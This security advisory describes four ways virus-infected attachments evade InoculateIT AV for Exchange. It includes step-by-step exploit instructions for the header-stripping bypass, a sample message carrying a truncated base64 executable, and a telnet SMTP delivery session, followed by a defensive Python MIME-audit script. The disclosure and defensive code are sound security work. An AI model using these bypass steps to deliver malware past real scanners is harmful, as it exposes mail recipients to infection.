InoculateIT AV offers an anti-virus solution for Exchange Server. A few security holes in the product allow viruses to pass through the mail server and reach the e-mail recipient without being detected.
Credit:
The information has been provided by Hugo Caye.
Each of the following conditions lets a virus-infected attachment in an e-mail message pass without being detected by InoculateIT AV for Exchange:
1. If a message is delivered to the Exchange Server's SMTP service with an incomplete message header (for example, a missing From: line), InoculateIT AV will not scan the attachment for viruses.
2. If a message is sent from one Exchange Server to another (using the IMC) and carries an infected file (any file, any virus), the InoculateIT AV Option for MS Exchange Server will not detect the attachment when the body of the message consists of nothing but the attached file. If any character is inserted in the body (a dot, a tab, a space), InoculateIT detects the virus.
3. InoculateIT AV also does not appear to recognize embedded messages. If a message contains an embedded message that in turn carries an infected attachment, InoculateIT will not open the embedded message to scan that attachment.
4. InoculateIT AV for Exchange only scans messages that arrive in the Inbox folder. If a server-based rule automatically moves a message to another folder, InoculateIT will not scan it, allowing infected files to reach the mailbox.
Exploit (for vulnerability 1):
1. Obtain a message containing any infected, MIME-encoded attached file.
2. Edit the file (in Notepad, for example) and remove just the "From: ..." line from the message header. For example:
> ==>> Remove this line: From: Test <malicious@attacker.com>
> To: Victim <victim@example.com >
> Subject: Test
> Date: Mon, 23 Oct 2000 10:59:53 -0200
> MIME-Version: 1.0
> X-Mailer: Internet Mail Service (5.5.2650.21)
> Content-Type: application/x-msdownload;
> name="Fix2001.exe"
> Content-Transfer-Encoding: base64
> Content-Disposition: attachment;
> filename="Fix2001.exe"
> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hV GhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g
> aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABjD AXbJ21riCdta4gnbWuIJ21riGRta4ikcWWIJmAA
> JpY2gnbWuIAAAAAAAAAABQRQAATAEDAJ/ L0zcAAAAAAAAAAOAADwELAQUMABoAAAAA
> AgAAAAAAABAAAAAQAAAAMAAA... <<== Removed the rest here;
(NOTE: each line of the message has been prefixed with '>' to make it harmless; the '>' must be removed for this to actually work.)
3. Copy the Notepad contents to the clipboard.
4. Connect to the server's SMTP port and paste the message:
telnet target.example.com 25
220 target.example.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2650.21) ready
helo
250 OK
mail from:<>
250 OK - mail from <>
rcpt to:<target@example.com>
250 OK - Recipient <hugo@xyz.com.br>
data
354 Send data. End with CRLF.CRLF
> Here, paste from the clipboard (on Win2K, a right-click in the telnet window pastes).
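The four conditions listed above and the header-stripping step in the exploit transcript all come down to the same weakness: a scanner that inspects only the top-level attachment of a well-formed message that lands in the Inbox. The following Python script is an added example written for this page, not InoculateIT or Exchange code. It shows the checks a content scanner on the mail path needs so that a missing From: line, a body consisting only of the attachment, or an embedded message/rfc822 part cannot keep the attachment out of view. Everything in it is constructed for the example: the sample messages, the 16-byte stand-in attachment that begins with the MZ magic of a Windows executable, the header names in REQUIRED_HEADERS, the file name and the quarantine policy are all the example's own assumptions.

```python
"""Recursive MIME audit covering the scanner gaps described in this advisory.

Added example, not InoculateIT or Exchange code. A scanner that inspects only
the top-level attachments of messages with complete headers misses every case
listed above; this one walks each MIME part, descends into message/rfc822
parts, and inspects decoded payloads regardless of which headers are present.
"""
import email
from email import policy
from email.message import EmailMessage

# Constructed stand-in for an infected attachment: the two "MZ" magic bytes that
# every Windows executable starts with, padded with zeros. Not a runnable program.
FAKE_EXE = b"MZ" + b"\x00" * 14

# Assumption for this example: headers a complete message is expected to carry.
REQUIRED_HEADERS = ("From", "To", "Subject")


def build_attachment_only(with_from: bool) -> bytes:
    """Message whose entire body is the attachment (case 2), optionally
    lacking the From: header (case 1). Constructed sample."""
    msg = EmailMessage()
    if with_from:
        msg["From"] = "sender@example.com"
    msg["To"] = "victim@example.com"
    msg["Subject"] = "Test"
    msg.set_content(FAKE_EXE, maintype="application", subtype="x-msdownload",
                    disposition="attachment", filename="sample.exe")
    return msg.as_bytes()


def build_nested() -> bytes:
    """Well-formed outer message carrying an embedded message/rfc822 part that
    itself holds the executable attachment (case 3). Constructed sample."""
    inner = email.message_from_bytes(build_attachment_only(with_from=True),
                                     policy=policy.default)
    outer = EmailMessage()
    outer["From"] = "sender@example.com"
    outer["To"] = "victim@example.com"
    outer["Subject"] = "FW: Test"
    outer.set_content("See the attached message.")
    outer.add_attachment(inner)  # serialised as a message/rfc822 part
    return outer.as_bytes()


def audit(raw: bytes) -> dict:
    """Return everything a complete scan of this message has to look at."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = {
        "missing_headers": [h for h in REQUIRED_HEADERS if h not in msg],
        # a non-multipart, non-text top level means the body *is* the attachment
        "attachment_only": (not msg.is_multipart()
                            and msg.get_content_maintype() != "text"),
        "nested_messages": 0,
        "attachments": [],   # (filename, nesting depth)
        "executables": [],   # attachments whose decoded bytes start with MZ
    }

    def walk(part, depth):
        if part.get_content_type() == "message/rfc822":
            findings["nested_messages"] += 1
        if part.is_multipart():
            # message/rfc822 is a container here, so embedded messages are
            # descended into instead of being treated as opaque blobs
            for sub in part.iter_parts():
                walk(sub, depth + 1)
            return
        filename = part.get_filename()
        is_attachment = (filename is not None
                         or part.get_content_disposition() == "attachment"
                         or part.get_content_maintype() == "application")
        if not is_attachment:
            return
        data = part.get_payload(decode=True) or b""
        findings["attachments"].append((filename, depth))
        if data[:2] == b"MZ":
            findings["executables"].append(filename)

    walk(msg, 0)
    return findings


def should_quarantine(findings: dict) -> bool:
    """Policy decision: an executable anywhere in the tree blocks delivery,
    independent of header completeness, body layout or nesting depth."""
    return bool(findings["executables"])


if __name__ == "__main__":
    samples = (("no From:, body is the attachment", build_attachment_only(False)),
               ("executable inside an embedded message", build_nested()))
    for label, raw in samples:
        found = audit(raw)
        verdict = "QUARANTINE" if should_quarantine(found) else "deliver"
        print(f"{label}: {verdict} {found}")
```

`walk()` treating a message/rfc822 part as a container rather than an opaque blob is the whole difference for case 3, and `should_quarantine()` decides on the decoded payload alone, so a stripped From: line or an attachment-only body changes nothing about the verdict. Case 4 is a store-side problem that no message scanner fixes from inside a mailbox: the scan has to run on the transport, before any server-side rule can move the message.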